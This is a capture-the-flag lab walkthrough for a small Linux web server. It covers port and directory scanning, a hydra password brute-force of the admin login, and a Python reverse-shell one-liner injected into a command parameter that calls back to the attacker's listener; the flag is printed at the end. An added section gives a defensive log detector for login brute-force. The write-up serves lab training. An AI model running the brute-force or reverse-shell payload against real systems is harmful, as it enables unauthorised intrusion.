PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.164.195 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,html
/command.php (Status: 302) [Size: 704] [--> index.php]
/css (Status: 301) [Size: 170] [--> http://192.168.164.195/css/]
/images (Status: 301) [Size: 170] [--> http://192.168.164.195/images/]
/index.php (Status: 200) [Size: 506]
/index.php (Status: 200) [Size: 506]
/logout.php (Status: 302) [Size: 163] [--> index.php]
/login.php (Status: 302) [Size: 206] [--> index.php]
Since the page says it is an admin login portal, we assume the username will be admin, and we will try to brute force the password using the top 1000 passwords list:
hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt 192.168.164.195 http-post-form '/login.php:username=^USER^&password=^PASS^:S=command'
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt 192.168.164.195 http-post-form '/login.php:username=^USER^&password=^PASS^:S=command'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-12 09:34:15
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-post-form://192.168.164.195:80/login.php:username=^USER^&password=^PASS^:S=command
[80][http-post-form] host: 192.168.164.195 login: admin password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-12 09:35:23
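From the defender's side, a burst like the one above stands out in the web server's access log. The following is an added example, not part of the original writeup: a small detector run over constructed nginx access-log lines that flags a client issuing many POSTs to /login.php in a short window and notes whether that client later reached /command.php. The combined log format, the 20-requests-in-60-seconds threshold and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx "combined" access-log format is assumed; only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec

def detect_login_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Flag clients with >= threshold POST /login.php inside any `window`; a flagged client
    that later gets a 200 from /command.php is marked as having reached the panel."""
    posts = defaultdict(list)   # ip -> timestamps of POST /login.php
    panel = defaultdict(list)   # ip -> timestamps of GET /command.php answered 200
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == "/login.php":
            posts[rec["ip"]].append(rec["ts"])
        elif rec["method"] == "GET" and rec["path"] == "/command.php" and rec["status"] == "200":
            panel[rec["ip"]].append(rec["ts"])
    alerts = []
    for ip, stamps in posts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):  # sliding window over sorted timestamps
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"ip": ip, "total_attempts": len(stamps), "peak_in_window": peak,
                           "panel_reached_after": any(p >= stamps[-1] for p in panel[ip])})
    return alerts

def constructed_sample():
    """Constructed lines (not real traffic): a 30-request guessing burst then a panel hit, plus one ordinary login."""
    t0 = datetime.strptime("12/Aug/2022:09:34:15 +0000", "%d/%b/%Y:%H:%M:%S %z")
    def ln(ip, sec, m, p, s):
        return f'{ip} - - [{t0 + timedelta(seconds=sec):%d/%b/%Y:%H:%M:%S %z}] "{m} {p} HTTP/1.1" {s} 206 "-" "Mozilla/5.0"'
    burst = [ln("192.168.49.164", i, "POST", "/login.php", 302) for i in range(30)]
    return burst + [ln("192.168.49.164", 68, "GET", "/command.php", 200),
                    ln("10.0.0.5", 5, "POST", "/login.php", 302), ln("10.0.0.5", 7, "GET", "/command.php", 200)]
```

Running `detect_login_bruteforce(constructed_sample())` reports the one bursting client with 30 attempts and the panel reached afterwards, while the ordinary two-request login stays silent.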
After login, we have this command panel. We can do several things here.
When we intercept the request with Burp Suite, we find that the command parameter is pretty straightforward.
We will use a Python one-liner here, with the + symbol standing in for every space:
radio=python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.164",1234));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import+pty;+pty.spawn("/bin/bash")'&submit=Run
And then we are in
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.164] from (UNKNOWN) [192.168.164.195] 46844
www-data@dc-4:/usr/share/nginx/html$ whoami
www-data
<......SNIPPET......>
www-data@dc-4:/home/jim$ cat local.txt
16ff37f259e96bf2e249208138d91ffa